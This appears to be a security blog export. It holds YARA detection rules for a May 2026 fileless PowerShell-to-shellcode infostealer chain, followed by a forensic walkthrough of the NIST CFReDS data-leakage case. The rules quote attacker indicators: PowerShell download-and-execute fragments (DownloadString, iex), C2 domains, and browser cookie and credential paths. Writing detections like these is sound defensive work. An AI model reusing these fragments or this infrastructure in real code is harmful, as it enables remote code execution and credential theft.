        $url_full    = "https://authexingload.space/bnyu.r" ascii nocase
        $var_dl      = "CitVc1NvRWSp" ascii
        $ps_bxor     = "-bxor [byte][char]$key" ascii nocase
        $ps_fromb64  = "[Convert]::FromBase64String" ascii nocase
        $ps_webdl    = "(New-Object Net.WebClient).DownloadString" ascii nocase
        $ps_iex      = "iex $script" ascii nocase

    condition:
        filesize < 64KB
        and (
            (all of ($url*) or $var_dl)
            and 2 of ($ps_*)
        )
        or (
            $xor_key and $b64_blob
        )
}

// ---------------------------------------------------------------------------
// Stage 1/2 — Unicode b64 stager spawning hidden 32-bit PowerShell via STDIN
// SHA256: 986c84f6345e6b40f5ece22c961a7fdb9356733c2ca0b8a22970c7c18ee1ed4e
// ---------------------------------------------------------------------------
rule MAL_PS_Stage2_SysWOW64_Hidden_Stdin_Loader_May2026
{
    meta:
        author      = "Jeel Nariya / DFIR analysis"
        description = "PowerShell stager: Unicode FromBase64String payload + SysWOW64 hidden PS with RedirectStandardInput"
        date        = "2026-06-01"
        stage       = "stage1_ps1"
        hash        = "986c84f6345e6b40f5ece22c961a7fdb9356733c2ca0b8a22970c7c18ee1ed4e"
        tactic      = "T1059.001"
        technique   = "T1027"
        severity    = "high"

    strings:
        $silent      = "$ErrorActionPreference = 'SilentlyContinue'" ascii nocase
        $unicode_b64 = "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(" ascii nocase
        $syswow64    = "SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" ascii nocase wide
        $hidden      = "-WindowStyle Hidden" ascii nocase
        $noprofile   = "-NoProfile" ascii nocase
        $stdin       = "RedirectStandardInput = $true" ascii nocase
        $stdin2      = "RedirectStandardInput=$true" ascii nocase
        $writeline   = "StandardInput.WriteLine($pay)" ascii nocase
        $iex         = "IEX $pay" ascii nocase

    condition:
        filesize < 20MB
        and $silent
        and $unicode_b64
        and $syswow64
        and 2 of ($hidden, $noprofile, $stdin, $stdin2, $writeline, $iex)
}

// ---------------------------------------------------------------------------
// Stage 3 — In-memory .NET PE via Reflection.Assembly::Load + XOR
// SHA256: beef326622ceb85d37697b965c55290f04c0c6088016b45ba9e17026e36d1fe3
// ---------------------------------------------------------------------------
rule MAL_PS_Stage3_Reflective_DotNet_XOR_Loader_May2026
{
    meta:
        author      = "Jeel Nariya / DFIR analysis"
        description = "PowerShell reflective .NET loader: XOR-decrypt base64 assembly, load via Reflection, invoke EntryPoint"
        date        = "2026-06-01"
        stage       = "stage3"
        hash        = "beef326622ceb85d37697b965c55290f04c0c6088016b45ba9e17026e36d1fe3"
        tactic      = "T1059.001"
        technique   = "T1620"
        severity    = "critical"

    strings:
        $silent      = "$ErrorActionPreference = 'SilentlyContinue'" ascii nocase
        $forms       = "Add-Type -AssemblyName System.Windows.Forms" ascii nocase
        $reflect     = "[Reflection.Assembly]::Load($p)" ascii nocase
        $entry       = "$m = $a.EntryPoint" ascii nocase
        $invoke0     = "$m.Invoke($null, $null)" ascii nocase
        $invoke1     = "$m.Invoke($null, @(,[string[]]@()))" ascii nocase
        $xor_loop    = "$p[$i] = $d[$i] -bxor $k[$i % $k.Length]" ascii nocase
        $xor_key_b64 = "DBppizJgfnEzl9LttCPeWFxuBA33gBKuY4Hkq2oZW00=" ascii
        $data_prefix = "QUD5izFgfnE3l9LtS9zeWORuBA33gBKuI4Hkq2oZW01" ascii
        $lure_url    = "syscheck-loadverifyov3.pages.dev" ascii nocase

    condition:
        filesize < 5MB
        and $silent
        and $forms
        and $reflect
        and ($entry or $xor_loop or $invoke0 or $invoke1)
        and (
            $xor_key_b64
            or $data_prefix
            or $lure_url
        )
}

// ---------------------------------------------------------------------------
// Stage 4 — .NET AES shellcode loader (DesktopWorkspaceSync masquerade)
// SHA256: c1e8ea0ebbe41a5714caca4fc85046de84dd82553379c16b7f83b0c7fc8ce20a
// ---------------------------------------------------------------------------
rule MAL_NET_Stage4_DesktopWorkspaceSync_AES_Shellcode_May2026
{
    meta:
        author      = "Jeel Nariya / DFIR analysis"
        description = ".NET GUI loader: AES DecryptShellcode, NtAllocateVirtualMemory/NtCreateThreadEx in-memory execution"
        date        = "2026-06-01"
        stage       = "stage4"
        hash        = "c1e8ea0ebbe41a5714caca4fc85046de84dd82553379c16b7f83b0c7fc8ce20a"
        tactic      = "T1055"
        technique   = "T1620"
        severity    = "critical"

    strings:
        $fake_name   = "DesktopWorkspaceSync" ascii wide
        $fake_desc   = "DesktopWorkspaceSync Component" ascii wide
        $enc_sc      = "EncryptedShellcode" ascii
        $dec_fn      = "DecryptShellcode" ascii
        $nt_alloc    = "NtAllocateVirtualMemory" ascii
        $nt_thread   = "NtCreateThreadEx" ascii
        $nt_wait     = "NtWaitForSingleObject" ascii
        $ntdll       = "ntdll.dll" ascii nocase
        $marshal     = "Marshal" ascii
        $crypto      = "CryptoStream" ascii
        $decryptor   = "CreateDecryptor" ascii
        $guid        = "9C9417E2-2F5D-4EF3-A430-A16CDBCDC8B0" ascii wide

    condition:
        uint16(0) == 0x5A4D
        and filesize < 3MB
        and (
            2 of ($fake_*)
            or ($dec_fn and $enc_sc)
        )
        and 2 of ($nt_alloc, $nt_thread, $nt_wait, $ntdll)
        and 2 of ($marshal, $crypto, $decryptor, $guid)
}

// ---------------------------------------------------------------------------
// Stage 5 — Donut shellcode (embedded DLL, DONUT_INSTANCE_EMBED)
// SHA256: 7e3e622c9762b8ccdf813c0b288f677f1b4055e31389440a9b692638555a5153
// ---------------------------------------------------------------------------
rule MAL_SHELLCODE_Donut_Stage5_May2026
{
    meta:
        author      = "Jeel Nariya / DFIR analysis (Donut sig: Volexity)"
        description = "Donut v1 x86 shellcode loader with embedded module; matches stage5_shellcode.bin"
        date        = "2026-06-01"
        stage       = "stage5"
        hash        = "7e3e622c9762b8ccdf813c0b288f677f1b4055e31389440a9b692638555a5153"
        reference   = "https://github.com/volexity/donut-decryptor"
        severity    = "critical"

    strings:
        // Donut v1.0 x86 loader prologue (Volexity)
        $donut_v1_x86 = { 81 EC D4 02 00 00 53 55 56 8B B4 24 E4 02 00 00 33 DB 57 8B FB 39 9E 38 02 00 00 0F 84 EA 00 00 00 FF 76 2C FF 76 28 FF B6 8C 00 00 00 FF B6 88 }
        // Sample-specific shellcode header (stage5_shellcode.bin offset 0)
        $sc_hdr       = { E8 C0 EF 03 00 C0 EF 03 00 36 DD 30 89 03 59 B4 27 02 7A 1A 55 CC 22 4D 36 A8 9E 77 93 A9 13 38 }

    condition:
        filesize < 512KB
        and (
            $donut_v1_x86
            or $sc_hdr at 0
        )
}

// ---------------------------------------------------------------------------
// Stage 6 — ASMx86 infostealer / C2 (API hashing, AFD bypass, browser theft)
// SHA256: 25d0ad1cc25b94cb4e01ece63b9de726212ed4172f284b12946c5c5b6c732f90
// ---------------------------------------------------------------------------
rule MAL_WIN_Stage6_Trxzidan_Infostealer_May2026
{
    meta:
        author      = "Jeel Nariya / DFIR analysis"
        description = "Final ASMx86 payload: custom API hash resolver, sandbox/EDR checks, browser/Steam theft, AFD C2"
        date        = "2026-06-01"
        stage       = "stage6"
        hash        = "25d0ad1cc25b94cb4e01ece63b9de726212ed4172f284b12946c5c5b6c732f90"
        c2          = "tq.trxzidan.icu"
        tactic      = "T1041"
        severity    = "critical"

    strings:
        // C2 / staging (domain split/obfuscated in binary)
        $c2_font     = "segoeui.tttq.trxzi" ascii
        $c2_telegra  = "telegra.ph/Parameters-04" ascii nocase
        $c2_http     = "https://telegra.ph/Parameters-04http://" ascii nocase

        // Browser / credential theft paths
        $cookie_db   = "\\cookies.sqlite" ascii nocase
        $cookie_net  = "\\Network\\Cookies\\Login Data For " ascii nocase
        $formhist    = "formhistory.sql\\Web Dat" ascii nocase
        $profiles    = "profiles" ascii
        $prefs       = "prefs.js" ascii

        // Low-level networking (AFD.sys)
        $afd_open    = "AfdOpenP" ascii
        $afd_ep      = "\\Device\\Afd\\Endpoint" ascii wide

        // Anti-sandbox process names (built at runtime; partial literals present)
        $av_agent    = "drivers\\agent.ex" ascii nocase
        $av_arun     = "arun" ascii
        $av_agenf    = "agenf" ascii
        $av_anyrf    = "anyrf" ascii
        $av_qemu     = "qemu" ascii
        $av_qemuga   = "-ga." ascii
        $av_vbox     = "vbox" ascii
        $av_tray     = "tray" ascii
        $av_klhk     = "@ klhk" ascii
        $av_klif     = "@ klif" ascii
        $av_sys      = "@$.sys" ascii

        // Runtime anti-VM string build sequences (x86 mov dword writes)
        $build_arun  = { C7 00 61 72 75 6E C7 40 04 61 67 65 6E 66 }  // arun + agenf
        $build_qemu  = { C7 00 71 65 6D 75 C7 40 04 2D 67 61 2E C7 40 08 65 78 65 }  // qemu + -ga. + exe
        $build_vbox  = { C7 00 76 62 6F 78 C7 40 04 74 72 61 79 }  // vbox + tray

        // Custom API hash algorithm constants (blog / hash_resolve.py)
        $hash_c1     = { A5 87 A8 75 }  // 0x75A887A5
        $hash_c2     = { 7F 9E 67 86 }  // 0x86679E7F
        $hash_c3     = { 6B B4 DE CE }  // 0xCEDEB46B
        $hash_c4     = { 03 D0 28 92 }  // 0x9228D003

        // Masqueraded path noise (unique to this sample)
        $path_noise  = "System32\\kernel3System32\\user32.Fonts\\" ascii

    condition:
        uint16(0) == 0x5A4D
        and filesize < 400KB
        and (
            $c2_font
            or $c2_telegra
            or $c2_http
        )
        and 2 of ($cookie_*, $formhist, $profiles, $prefs)
        and (
            $afd_open
            or $afd_ep
        )
        and (
            2 of ($av_*)
            or 1 of ($build_*)
        )
        and 2 of ($hash_*)
        and $path_noise
}

// ---------------------------------------------------------------------------
// Campaign aggregator — any stage of the May 2026 chain
// ---------------------------------------------------------------------------
rule MAL_Campaign_Fileless_PS_Shellcode_Chain_May2026
{
    meta:
        author      = "Jeel Nariya / DFIR analysis"
        description = "Meta-rule: matches any stage of the fileless PowerShell→.NET→Donut→ASM infostealer chain"
        date        = "2026-06-01"
        reference   = "PowerShell to Shellcode May 2026"
        severity    = "critical"

    condition:
        MAL_PS_ClickFix_Stage0_XOR_Authexingload_May2026
        or MAL_PS_Stage2_SysWOW64_Hidden_Stdin_Loader_May2026
        or MAL_PS_Stage3_Reflective_DotNet_XOR_Loader_May2026
        or MAL_NET_Stage4_DesktopWorkspaceSync_AES_Shellcode_May2026
        or MAL_SHELLCODE_Donut_Stage5_May2026
        or MAL_WIN_Stage6_Trxzidan_Infostealer_May2026
}

// ---------------------------------------------------------------------------
// Optional: hash-based exact match rules (low false positive)
// ---------------------------------------------------------------------------
rule MAL_HASH_Exact_Samples_May2026
{
    meta:
        author      = "Jeel Nariya / DFIR analysis"
        description = "Exact SHA256 matches for published chain samples"
        date        = "2026-06-01"
        severity    = "critical"

    condition:
        hash.sha256(0, filesize) == "2e2490b755819d71092a71961d4bfaff5cf3f69fd00199e38759370806d7f78b"
        or hash.sha256(0, filesize) == "986c84f6345e6b40f5ece22c961a7fdb9356733c2ca0b8a22970c7c18ee1ed4e"
        or hash.sha256(0, filesize) == "9d0ce7a84e62e3458b82d682c7c3f97d095cb2fba8caa0263ee8929994990254"
        or hash.sha256(0, filesize) == "beef326622ceb85d37697b965c55290f04c0c6088016b45ba9e17026e36d1fe3"
        or hash.sha256(0, filesize) == "c1e8ea0ebbe41a5714caca4fc85046de84dd82553379c16b7f83b0c7fc8ce20a"
        or hash.sha256(0, filesize) == "7e3e622c9762b8ccdf813c0b288f677f1b4055e31389440a9b692638555a5153"
        or hash.sha256(0, filesize) == "25d0ad1cc25b94cb4e01ece63b9de726212ed4172f284b12946c5c5b6c732f90"
}

NIST CFReDS Data Leakage Case Analysis May 2026

Sat, 02 May 2026 00:00:00 GMT

Disk & Image Verification

What are the hash values (MD5 & SHA-1) of all images?

Does the acquisition and verification hash value match?

Artifact	Type	MD5	SHA-1	Notes
PC	System	`A49D1254C873808C58E6F1BCD60B5BDE`	`AFE5C9AB487BD47A8A9856B1371C2384D44FD785`	Primary system image
RM#2	Removable Media	`B4644902ACAB4583A1D0F9F1A08FAA77`	`048961A85CA3ECED8CC73F1517442D31D4DCA0A3`	USB / external device
RM#3 (Type1)	Removable Media	`858C7250183A44DD83EB706F3F178990`	`471D3EEDCA9ADD872FC0708297284E1960FF44F8`	Same as Type2
RM#3 (Type2)	Removable Media	`858C7250183A44DD83EB706F3F178990`	`471D3EEDCA9ADD872FC0708297284E1960FF44F8`	Duplicate of Type1
RM#3 (Type3)	Removable Media	`DF914108FB3D86744EB688EBA482FBDF`	`7F3C2EB1F1E2DB97BE6E963625402A0E362A532C`	Different dataset

Image File	MD5	SHA-256
cfreds_2015_data_leakage_pc.E01	`7338dbed7d2293334801416613bc17b5`	`e6365e44f1004252171acb73e6779be05277cbd57d09d7febed22d2463a956a9`
cfreds_2015_data_leakage_pc.E02	`51675274ad9eb6a15d0e562d10a4913f`	`3bc1c1cab227031e0a209972511d1e030f7cb60b76a89db0db7b412f56b660df`
cfreds_2015_data_leakage_pc.E03	`7a21bf1b6db3ce433c55ac76749f12d9`	`f45a0cd89b1f1a6a805771014f2dcef42497ba421c7edf1597ee50b5ca6c0b3c`
cfreds_2015_data_leakage_pc.E04	`62f6cce2ec9e1b1f7a21cef0d12e0e38`	`33cd294e44be91c5147296675fdbb40c270471480c4a1998d3a59fea3d944099`
cfreds_2015_data_leakage_rm#1.E01	`7cd7bc148d3a1e5f329cb3580d4d4f8f`	`a14150a21bc1e3700b51912c2ab20cd9587ad3e27ee67475af64508a7e760121`
cfreds_2015_data_leakage_rm#2.E01	`6cfbfdb14e0a504684a338b87362d753`	`25215f9bcb51ceee9147886ed3f5c13ef148de634fc5114491e0f8dad8b15696`
cfreds_2015_data_leakage_rm#3_type3.E01	`b49cb0c7dfccb8cd0e39424e3f1abc86`	`336e1307721ef5f63679379961d1716b74f986e69df8c40117d9cea7858d512b`

Partition & System Information

Identify the partition information of PC image.

No.	Bootable	File System	Start Sector	Total Sectors	Size
1		NTFS	2,048	204,800	100 MB
2	*	NTFS	206,848	41,734,144	19.9 GB

Explain installed OS information in detail. (OS name, install date, registered owner…)

System Registry Hives

Hive Name	File Path	SHA-256 Hash
SYSTEM	C:\Windows\System32\config\SYSTEM	e896ef300843a3efd1c1f96b25fd2b209cd1ad28d653ab6bc05699f910bbd3d1
SOFTWARE	C:\Windows\System32\config\SOFTWARE	03422334efaca3c9cd2657518b5706fb9ef42ef7abe49cc3dddaa98dabb394ac
SAM	C:\Windows\System32\config\SAM	6aecc0b2b5fb86a71498cb688bb59df43f85547723bff898a534fadef26c428f
SECURITY	C:\Windows\System32\config\SECURITY	1170568731c717d4d8c84ae52bd9ade737c3b0d4173127c68c3cc2ea8ff3b143

User Registry Hives

User	File Name	SHA-256 Hash
admin11	admin11_NTUSER.DAT	b8e18d84ad84735998805a25e22ae7b3c696aba2ff36c73a1e294862805aaf4c
informant	informant_NTUSER.DAT	2190b57e2908d36f835589cc530c8c471ea48952f8edea70cc91488d9b5d1f64
temporary	tamporary_NTUSER.DAT	0edc2037f4daf584f4142808aa52863262af746aa9ac2f1d415f5cc102649297
admin11	admin11_UsrClass.dat	d3a120dfd44e275dfd16ecec14da3d770e462cf8966e740c812e6f9c5492a648
informant	informant_UsrClass.dat	a26fe02da57e6c84a911edf9dd39021ecf200d66d168841331dae0be9dd2f1b7
temporary	tamporary_UsrClass.datT	d36330d2553c21e3df4708fc3d88d1ae1542be8c1c5154676994e92820e1c231

Opened the SOFTWARE hive in RegExplorer,
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Installed OS Information

Field	Value
OS Name	Windows 7 Ultimate
Edition	Ultimate
Version	6.1
Build Number	7601
Service Pack	Service Pack 1
Architecture	Multiprocessor Free (64-bit)
Installation Type	Client
System Root	C:\Windows
Registered Owner	informant
Registered Organization	—
Product ID	00426-292-0000007-85262

What is the time zone setting?

HKLM\SYSTEM\ControlSet###\Control\TimeZoneInformation

Time Zone Configuration

Field	Value
Time Zone Name	Eastern Standard Time
Bias (UTC Offset)	UTC -5 hours
Active Bias	UTC -4 hours
Standard Bias	0
Daylight Bias	-60 minutes

Daylight Saving Time (DST) Rules

Setting	Value
DST Start	2nd Sunday of March at 02:00
DST End	1st Sunday of November at 02:00

Raw Interpretation (Important for Report)

Registry Field	Meaning
Bias = 300	Base offset = UTC -5 hours (300 minutes)
DaylightBias = -60	DST adjustment = -1 hour → UTC -4
ActiveTimeBias = 240	System was in DST at acquisition time
StandardStart	DST ends → November
DaylightStart	DST begins → March

What is the computer name?

`HKLM\SYSTEM\ControlSet###\Control\ComputerName\ComputerName
`HKLM\SYSTEM\ControlSet###\Services\Tcpip\Parameters

Registry Value	Data	Purpose
ComputerName	INFORMANT-PC	Primary system name
Hostname	informant-PC	Network hostname
NV Hostname	informant-PC	Persistent hostname (non-volatile)

User Accounts & Activity

List all accounts in OS except system accounts. (Account name, login count, last logon date…)

HKLM\SAM\USERS

User Name	User ID (RID)	Total Login Count	Last Logon Time	Created On	Last Password Change	Invalid Login Count
informant	1000	10	2015-03-25 14:45:59	2015-03-22 14:33:54	2015-03-22 14:33:54	0
admin11	1001	2	2015-03-22 15:57:02	2015-03-22 15:51:54	2015-03-22 15:52:10	0
ITechTeam	1002	0	—	2015-03-22 15:52:30	2015-03-22 15:52:45	1
temporary	1003	1	2015-03-22 15:55:57	2015-03-22 15:53:01	2015-03-22 15:53:11	1

Who was the last user to logon into PC?

User Name	User ID (RID)	Total Login Count	Last Logon Time	Created On	Last Password Change	Invalid Login Count
informant	1000	10	2015-03-25 14:45:59	2015-03-22 14:33:54	2015-03-22 14:33:54	0

When was the last recorded shutdown date/time?

HKLM\SYSTEM\ControlSet###\Control\Windows (value: ShutdownTime)

Raw Value

57-A9-48-B5-10-67-D0-01

This is a Windows FILETIME (little-endian, 64-bit).

Field	Value
Last Shutdown Time (UTC)	2015-03-25 15:31:05
Time zone Applied (EDT, UTC-4)	2015-03-25 11:31:05

Network Information

Explain network interface(s) with DHCP assigned IP.

HKLM\System\ControlSet00x\Services\Tcpip\Parameters\Interfaces\{GUID}

Network Interface (DHCP Assigned)

Field	Value
IP Address	10.11.11.129
Subnet Mask	255.255.255.0
Default Gateway	10.11.11.2
DHCP Server	10.11.11.254
DNS Server	10.11.11.2
Domain	localdomain
DHCP Enabled	Yes

DHCP Lease Information

Field	Value
Lease Obtained	2015-03-25 13:59:50
Lease Expiry	2015-03-25 14:29:50
Lease Duration	1800 seconds (30 minutes)

Applications & Execution

What applications were installed by the suspect after installing OS?

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
64-bit Systems: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall

Timestamp	Key Name	Display Name	Version	Publisher	Install Date	Install Source	Install Location	Uninstall String
2009-07-14 04:53:25	AddressBook	—	—	—	—	—	—	—
2009-07-14 04:53:25	Connection Manager	—	—	—	—	—	—	—
2009-07-14 04:53:25	DirectDrawEx	—	—	—	—	—	—	—
2009-07-14 04:53:25	Fontcore	—	—	—	—	—	—	—
2015-03-22 15:11:51	Google Chrome	Google Chrome	41.0.2272.101	Google Inc.	20150322	—	C:\Program Files (x86)\Google\Chrome\Application	"C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.101\Installer\setup.exe" --uninstall --multi-install --chrome --system-level --verbose-logging
2009-07-14 04:53:25	IE40	—	—	—	—	—	—	—
2009-07-14 04:53:25	IE4Data	—	—	—	—	—	—	—
2009-07-14 04:53:25	IE5BAKEX	—	—	—	—	—	—	—
2009-07-14 04:53:25	IEData	—	—	—	—	—	—	—
2009-07-14 04:53:25	MobileOptionPack	—	—	—	—	—	—	—
2009-07-14 04:53:25	SchedulingAgent	—	—	—	—	—	—	—
2009-07-14 04:53:25	WIC	—	—	—	—	—	—	—
2015-03-22 15:16:03	{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	Google Update Helper	1.3.26.9	Google Inc.	20150322	C:\Program Files (x86)\Google\Update\1.3.26.9\|—	MsiExec.exe /I{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
2015-03-23 20:02:46	{6C36881B-0E51-4231-9D02-BF2149664D34}	Google Drive	1.20.8672.3137	Google, Inc.	20150323	C:\Program Files (x86)\Google\Update\Install{FADF8BBF-DB89-448E-BC51-AFDB1CF3B0D1}\|—	MsiExec.exe /X{6C36881B-0E51-4231-9D02-BF2149664D34}
2015-03-23 20:00:45	{78002155-F025-4070-85B3-7C0453561701}	Apple Application Support	3.0.6	Apple Inc.	20150323	C:\Users\INFORM~1\AppData\Local\Temp\IXP374.TMP\|C:\Program Files (x86)\Common Files\Apple\Apple Application Support\|MsiExec.exe /I{78002155-F025-4070-85B3-7C0453561701}
2015-03-23 20:01:01	{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}	Apple Software Update	2.1.3.127	Apple Inc.	20150323	C:\Users\INFORM~1\AppData\Local\Temp\IXP374.TMP\|C:\Program Files (x86)\Apple Software Update\|MsiExec.exe /I{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}

List application execution logs. (Executable path, execution time, execution count...)

Artifact Type	Source Type	Location / Registry Path	Data Extracted
Windows Prefetch	File	`C:\Windows\Prefetch\*.pf`	Executable file paths, execution timestamps, execution counts
IconCache	File	`C:\Users\informant\AppData\Local\IconCache.db`	Executable file paths, associated icon images
UserAssist	Registry	`HKU\informant\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\*\Count\`	Executable file paths, execution timestamps, execution counts
Application Compatibility (Shimcache)	Registry	`HKLM\SYSTEM\ControlSet###\Control\Session Manager\AppCompatCache\`	Executable file paths, last modified timestamps
Application Compatibility Cache	Registry	`HKU\informant\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\`	Executable file paths, last modified timestamps
MuiCache	Registry	`HKU\informant\Software\Classes\Local-Settings\Software\Microsoft\Windows\Shell\MuiCache\`	Executable file paths

UserAssist

Application Compatibility (Shimcache)

Application Compatibility Cache

(Some Windows executables and duplicated items are excluded)
Execution Count may not be accurate.
Timestamps of UserAssist and Prefetch: Execution Time
Timestamps of Shimcache: Last Modified Time from filesystem metadata

Timestamp	Execution Path	Count	Source
2015-03-22 11:11:04	C:\Users\informant\Desktop\temp\IE11-Windows6.1-x64-en-us.exe	N/A	ShimCache
2015-03-22 11:11:04	C:\Users\informant\Desktop\Download\IE11-Windows6.1-x64-en-us.exe	N/A	ShimCache
2015-03-22 11:12:32	C:\Users\informant\Desktop\Download\IE11-Windows6.1-x64-en-us.exe	1	UserAssist
2015-03-23 15:56:33	C:\Users\informant\Downloads\googledrivesync.exe	N/A	ShimCache
2015-03-23 15:56:33	C:\Users\informant\Downloads\icloudsetup.exe	N/A	ShimCache
2015-03-23 15:56:33	C:\Users\INFORM~1\AppData\Local\Temp\GUMA150.tmp\GoogleUpdateSetup.exe	N/A	ShimCache
2015-03-23 16:00:59	C:\Windows\Installer{GUID}\AppleSoftwareUpdateIco.exe	N/A	ShimCache
2015-03-23 16:02:07	C:\Users\INFORM~1\AppData\Local\Temp\GUMA150.tmp\GoogleUpdate.exe	N/A	ShimCache
2015-03-23 16:02:09	C:\Program Files (x86)\GUMA94B.tmp\GoogleUpdate.exe	N/A	ShimCache
2015-03-23 16:26:50	C:\Program Files\Microsoft Office\Office15\EXCEL.EXE	1	UserAssist
2015-03-23 16:27:33	C:\Program Files\Microsoft Office\Office15\POWERPNT.EXE	2	UserAssist
2015-03-24 14:29:07	C:\Program Files\Microsoft Games\Solitaire\solitaire.exe	1	Prefetch
2015-03-24 14:31:55	C:\Windows\System32\StikyNot.exe	2	Prefetch
2015-03-24 14:31:55	Microsoft.Windows.StickyNotes	13	UserAssist
2015-03-24 17:05:38	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	71	Prefetch
2015-03-25 10:41:03	C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE	1	Prefetch
2015-03-25 10:41:03	C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE	5	UserAssist
2015-03-25 10:42:47	C:\Program Files (x86)\Windows Media Player\wmplayer.exe	1	Prefetch
2015-03-25 10:42:47	Microsoft.Windows.MediaPlayer32	1	UserAssist
2015-03-25 10:47:40	C:\Users\informant\Desktop\Download\Eraser 6.2.0.2962.exe	N/A	ShimCache
2015-03-25 10:48:28	C:\Users\informant\Desktop\Download\ccsetup504.exe	N/A	ShimCache
2015-03-25 10:50:14	C:\Users\informant\Desktop\Download\Eraser 6.2.0.2962.exe	1	Prefetch
2015-03-25 10:50:14	C:\Users\informant\Desktop\Download\Eraser 6.2.0.2962.exe	1	UserAssist
2015-03-25 10:50:15	C:\Users\INFORM~1\AppData\Local\Temp\eraserInstallBootstrapper\dotNetFx40_Full_setup.exe	N/A	ShimCache
2015-03-25 10:50:15	C:\Users\INFORM~1\AppData\Local\Temp\eraserInstallBootstrapper\dotNetFx40_Full_setup.exe	1	Prefetch
2015-03-25 10:57:56	C:\Users\informant\Desktop\Download\ccsetup504.exe	1	Prefetch
2015-03-25 10:57:56	C:\Users\informant\Desktop\Download\ccsetup504.exe	1	UserAssist
2015-03-25 11:12:28	C:\Program Files\Eraser\Eraser.exe	1	UserAssist
2015-03-25 11:13:30	C:\Program Files\Eraser\Eraser.exe	2	Prefetch
2015-03-25 11:15:50	C:\Program Files\CCleaner\CCleaner64.exe	1	UserAssist
2015-03-25 11:15:50	C:\Program Files\CCleaner\CCleaner64.exe	2	Prefetch
2015-03-25 11:16:00	C:\Program Files (x86)\Google\Update\GoogleUpdate.exe	38	Prefetch
2015-03-25 11:18:29	C:\Program Files\CCleaner\uninst.exe	1	Prefetch
2015-03-25 11:21:30	C:\Program Files (x86)\Google\Drive\googledrivesync.exe	1	UserAssist
2015-03-25 11:21:31	C:\Program Files (x86)\Google\Drive\googledrivesync.exe	2	Prefetch
2015-03-25 11:22:06	C:\Program Files\Internet Explorer\iexplore.exe	2	Prefetch
2015-03-25 11:22:07	C:\Program Files (x86)\Internet Explorer\iexplore.exe	14	Prefetch
2015-03-25 11:24:48	C:\Program Files\Microsoft Office\Office15\WINWORD.EXE	3	Prefetch
2015-03-25 11:24:48	C:\Program Files\Microsoft Office\Office15\WINWORD.EXE	4	UserAssist
2015-03-25 11:28:47	C:\Windows\System32\xpsrchvw.exe	1	Prefetch
2015-03-25 11:28:47	C:\Windows\System32\xpsrchvw.exe	1	UserAssist

System Activity Timeline

List all traces about the system on/off and the user logon/logoff. (Time range: 09:00–18:00)

For this task, we have to carve all the Event logs from C:\Windows\System32\winevt\Logs\*,
So i carved all the logs include important one,
- Application.evtx
- Security.evtx
- System.evtx
- Setup.evtx
Parse all the important logs and convert it to csv using EvtxeCmd tool.

EvtxECmd.exe -f "Evtx Logs\<LogFileName>.evtx" --csv <DirectoryName>

Now we can analyze it using Timeline Explorer,

Core Logon / System Events (your timeline ones)

Event ID	Meaning	DFIR Insight
4608	Windows is starting up	System boot — start of activity window
4624	Successful logon	User/session access (interactive, RDP, service, etc.)
4634	Logoff (session ended)	Session terminated (not always user-initiated)
4647	User initiated logoff	Clean logoff (user clicked sign out)
4637	User account logoff (token ended)	Less common, system-driven logoff
1100	Event logging service shutdown	System shutdown (or logging stopped)

Authentication / Credential / Privilege Events

Event ID	Meaning	DFIR Insight
4648	Logon using explicit credentials	`runas`, lateral movement indicator
4672	Special privileges assigned	Admin/root-level login important
4673	Privileged service called	Sensitive API usage
4674	Operation on privileged object	Access to sensitive system resources
4625 (not shown but important)	Failed logon	Brute force / incorrect creds

Account & Policy Changes

Event ID	Meaning	DFIR Insight
4720	User account created	Persistence / attacker account
4722	Account enabled	Re-activation
4724	Password reset attempt	Possible takeover
4728	Added to privileged group	Privilege escalation
4732	Added to local group	Local privilege change
4733	Removed from group	Cleanup / stealth
4735	Group changed	Membership modification
4738	User account changed	Attribute change

System & Logon/Logoff Event Timeline

Time Generated	Event ID	Description
2015-03-22 10:51:14	4608	Starting up
2015-03-22 11:00:08	4624	Logon
2015-03-22 11:22:54	4624	Logon
2015-03-22 12:00:08	4647	Logoff
2015-03-22 12:00:09	1100	Shutdown
2015-03-23 13:24:23	4608	Starting up
2015-03-23 13:24:23	4624	Logon
2015-03-23 14:36:07	4624	Logon
2015-03-23 16:00:22	4624	Logon
2015-03-23 16:01:02	4624	Logon
2015-03-23 17:02:53	4647	Logoff
2015-03-23 17:02:59	1100	Shutdown
2015-03-24 09:21:29	4608	Starting up
2015-03-24 09:21:29	4624	Logon
2015-03-24 09:23:40	4624	Logon
2015-03-24 11:14:30	4624	Logon
2015-03-24 11:22:39	4624	Logon
2015-03-24 11:46:14	4624	Logon
2015-03-24 14:28:38	4624	Logon
2015-03-24 16:58:52	4624	Logon
2015-03-24 17:07:25	4647	Logoff
2015-03-24 17:07:26	1100	Shutdown
2015-03-25 09:05:41	4608	Starting up
2015-03-25 09:05:41	4624	Logon
2015-03-25 09:07:49	4624	Logon
2015-03-25 09:23:59	4624	Logon
2015-03-25 10:31:53	4624	Logon
2015-03-25 10:45:59	4637	Logoff
2015-03-25 10:50:28	4624	Logon
2015-03-25 10:50:30	4624	Logon
2015-03-25 10:50:50	4624	Logon
2015-03-25 10:56:55	4624	Logon
2015-03-25 10:57:18	4624	Logon
2015-03-25 11:18:54	4624	Logon
2015-03-25 11:30:57	4647	Logoff
2015-03-25 11:31:00	1100	Shutdown

Web & Browser Forensics

What web browsers were used?

HKLM\SOFTWARE\Microsoft\Internet Explorer (value: svcVersion)
HKU\informant\Software\Google\Chrome\BLBeacon (value: version)

Value Name	Value / Data	Interpretation
MkEnabled	Yes	Feature enabled flag (likely Microsoft component active)
Version	9.11.9600.17691	Main software/version build identifier
Build	99600	Internal build number (Windows component)
W2kVersion	9.11.9600.17691	Compatibility version string
IntegratedBrowser	1	Internet Explorer integration enabled (1 = true)
